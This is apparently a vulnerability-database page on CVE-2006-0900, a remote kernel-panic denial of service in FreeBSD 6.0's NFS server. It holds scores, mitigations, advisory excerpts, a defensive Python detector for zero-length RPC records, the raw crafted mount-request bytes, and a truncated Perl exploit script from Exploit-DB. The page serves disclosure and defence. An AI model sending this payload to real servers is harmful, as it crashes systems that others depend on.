CVE-2006-0900
published 2006-02-27
CVE-2006-0900: nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
Priority: P341 · high · 7.8 CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS: 64.37% (99.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
Detection & IOCs (extracted from sources)
bytes
\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x2f\x74\x6d\x70
- Trigger condition is a TCP NFS RPC message to port 2049 with a zero-length payload, causing a NULL pointer dereference and kernel panic in nfsd.
- The exploit payload targets RPC program number 0x000186a5 (NFS mountd, decimal 100005) over TCP port 2049; monitor for crafted RPC MOUNT requests with this program number and zero-length or malformed payloads.
- The kernel will only process the malicious RPC messages if a userland nfsd daemon is running; detection should confirm nfsd is active on the target.
- Vulnerability is only exploitable when the NFS server is enabled and the nfsd daemon is running; disabling NFS server (nfs_server_enable=NO in /etc/rc.conf) or killing mountd/nfsd processes mitigates the risk.
- Firewall rules blocking RPC traffic to the NFS server from untrusted hosts serve as an effective network-level workaround.
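
As an added example (not taken from the advisory or any source quoted on this page), the zero-length condition in the first bullet can be checked on a reassembled client-to-server TCP stream to port 2049 by walking the ONC RPC record marks (RFC 5531: a 4-byte header whose top bit marks the last fragment and whose low 31 bits give the fragment length). The function names and both sample streams are constructed for illustration.

```python
import struct

LAST_FRAGMENT = 0x80000000   # top bit of the record mark: final fragment of a record
LENGTH_MASK = 0x7FFFFFFF     # low 31 bits: fragment length in bytes


def iter_records(stream: bytes):
    """Yield (offset, record_length, complete) for each RPC record in a
    reassembled client-to-server TCP byte stream."""
    pos, rec_start, rec_len = 0, 0, 0
    while pos + 4 <= len(stream):
        (mark,) = struct.unpack_from(">I", stream, pos)
        frag_len = mark & LENGTH_MASK
        pos += 4
        if pos + frag_len > len(stream):
            # Fragment body not fully captured: report what is there and stop.
            yield rec_start, rec_len + len(stream) - pos, False
            return
        pos += frag_len
        rec_len += frag_len
        if mark & LAST_FRAGMENT:
            yield rec_start, rec_len, True
            rec_start, rec_len = pos, 0


def find_empty_records(stream: bytes):
    """Return offsets of complete records that carry no RPC message at all,
    the zero-length condition described in the first bullet above."""
    return [off for off, length, complete in iter_records(stream)
            if complete and length == 0]


def _record(body: bytes) -> bytes:
    # Helper for the constructed samples: one single-fragment record.
    return struct.pack(">I", LAST_FRAGMENT | len(body)) + body


# Constructed sample: a 40-byte placeholder body standing in for a normal call.
BENIGN = _record(b"\x00" * 40)
# Constructed sample: the same record followed by a record mark with length 0.
SUSPECT = BENIGN + struct.pack(">I", LAST_FRAGMENT)

if __name__ == "__main__":
    print("benign :", find_empty_records(BENIGN))
    print("suspect:", find_empty_records(SUSPECT))
```

A zero-length fragment that is not the last one in its record is not flagged, because the record as a whole still carries data.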
GHSA
GHSA-6g68-8547-vmxp: nfsd in FreeBSD 6
ghsa_unreviewed·2022-05-03
CVE-2006-0900 [HIGH] GHSA-6g68-8547-vmxp: nfsd in FreeBSD 6
nfsd in FreeBSD 6.0 kernel allows remote attackers to cause a denial of service via a crafted NFS mount request, as demonstrated by the ProtoVer NFS test suite.
BSD
FreeBSD-SA-06:10.nfs: Remote denial of service in NFS server
bsd_advisories·2006-03-01·CVSS 7.8
CVE-2006-0900 [HIGH] FreeBSD-SA-06:10.nfs: Remote denial of service in NFS server
FreeBSD-SA-06:10.nfs Security Advisory
The FreeBSD Project
Topic: Remote denial of service in NFS server
Category: core
Module: sys_nfsserver
Announced: 2006-03-01
Credits: Evgeny Legerov
Affects: All FreeBSD releases.
Corrected: 2006-03-01 14:18:11 UTC (RELENG_6, 6.1-PRERELEASE)
2006-03-01 14:18:46 UTC (RELENG_6_0, 6.0-RELEASE-p5)
2006-03-01 14:19:48 UTC (RELENG_5, 5.5-PRERELEASE)
2006-03-01 14:21:01 UTC (RELENG_5_4, 5.4-RELEASE-p12)
2006-03-01 14:24:52 UTC (RELENG_5_3, 5.3-RELEASE-p27)
2006-03-01 14:21:56 UTC (RELENG_4, 4.11-STABLE)
2006-03-01 14:22:30 UTC (RELENG_4_11, 4.11-RELEASE-p15)
2006-03-01 14:23:07 UTC (RELENG_4_10, 4.10-RELEASE-p21)
CVE Name: CVE-2006-0900
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security bran
No detection rules found.
Exploit-DB
FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)
exploitdb·2006-02-28
CVE-2006-0900 FreeBSD 6.0 - 'nfsd' Remote Kernel Panic (Denial of Service)
---
#!/usr/bin/perl
## Saw an advisory on Dailydave and wrote a little script to
## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
##
## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
## Evgeny Legerov
## www.gleg.net
use IO::Socket;
sub usage
{
print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n";
print "Advisory from Evgeny Legerov (www.gleg.net)\n";
print "Code by str0ke (milw0rm.com)\n";
print "Usage: $0 www.example.com\n";
exit ();
}
my $host = shift || &usage;
my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" .
"\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" .
"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" .
"\x00\
Metasploit
FreeBSD Remote NFS RPC Request Denial of Service
metasploit
This module sends a specially-crafted NFS Mount request causing a kernel panic on a host running FreeBSD 6.0.
No writeups or analysis indexed.
- ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:10.nfs.asc
- http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html
- http://secunia.com/advisories/19017
- http://securityreason.com/securityalert/521
- http://www.osvdb.org/23511
- http://www.securityfocus.com/bid/16838
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24918